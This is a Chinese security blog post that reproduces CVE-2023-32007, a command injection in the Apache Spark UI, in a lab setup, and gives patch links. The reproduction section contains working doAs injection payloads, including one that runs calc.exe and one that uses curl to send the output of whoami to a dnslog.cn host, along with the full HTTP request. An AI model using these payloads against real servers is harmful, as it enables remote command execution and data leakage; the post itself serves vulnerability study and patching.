Apache Spark远程代码执行漏洞(CVE-2023-32007)

admin 2024年9月29日01:41:09评论63 views字数 1103阅读3分40秒阅读模式

网安引领时代,弥天点亮未来   

Apache Spark远程代码执行漏洞(CVE-2023-32007)
0x00写在前面
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
Apache Spark远程代码执行漏洞(CVE-2023-32007)
0x01漏洞介绍

Apache Spark是美国阿帕奇(Apache)基金会的一款支持非循环数据流和内存计算的大规模数据处理引擎。

Apache Spark 3.4.0之前版本存在命令注入漏洞,该漏洞源于如果ACL启用后,HttpSecurityFilter中的代码路径可以允许通过提供任意用户名来执行模拟,这将导致任意shell命令执行。

Apache Spark远程代码执行漏洞(CVE-2023-32007)
0x02影响版本

3.1.1 <= Apache Spark < 3.2.2

利用条件

Apache Spark UI 启用 ACL ,且低权限

Apache Spark远程代码执行漏洞(CVE-2023-32007)

Apache Spark远程代码执行漏洞(CVE-2023-32007)
0x03漏洞复现

1.下载部署有漏洞版本环境

powershell启动命令

.spark-shell.cmd --conf spark.acls.enable=true

Apache Spark远程代码执行漏洞(CVE-2023-32007)

访问漏洞环境

Apache Spark远程代码执行漏洞(CVE-2023-32007)

2.对漏洞进行复现

 POC (GET)

?doAs=`calc.exe`

执行calc命令

Apache Spark远程代码执行漏洞(CVE-2023-32007)

dnslog测试

http://10.211.55.7:4040/jobs/?doAs=`curl+$(whoami)hw9y0l.dnslog.cn`

Apache Spark远程代码执行漏洞(CVE-2023-32007)

GET /jobs/?doAs=`curl+$(whoami)hw9y0l.dnslog.cn` HTTP/1.1Host: 10.211.55.7:4040Connection: keep-aliveCache-Control: max-age=0DNT: 1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0  Chrome/116.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9

Apache Spark远程代码执行漏洞(CVE-2023-32007)

Apache Spark远程代码执行漏洞(CVE-2023-32007)
0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://lists.apache.org/thread/poxgnxhhnzz735kr1wos366l5vdbb0nvhttps://zone.huoxian.cn/d/2761-apache-spark-ui-cve-2023-32007

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月29日01:41:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache Spark远程代码执行漏洞(CVE-2023-32007)https://cn-sec.com/archives/1975423.html

发表评论

匿名网友 填写信息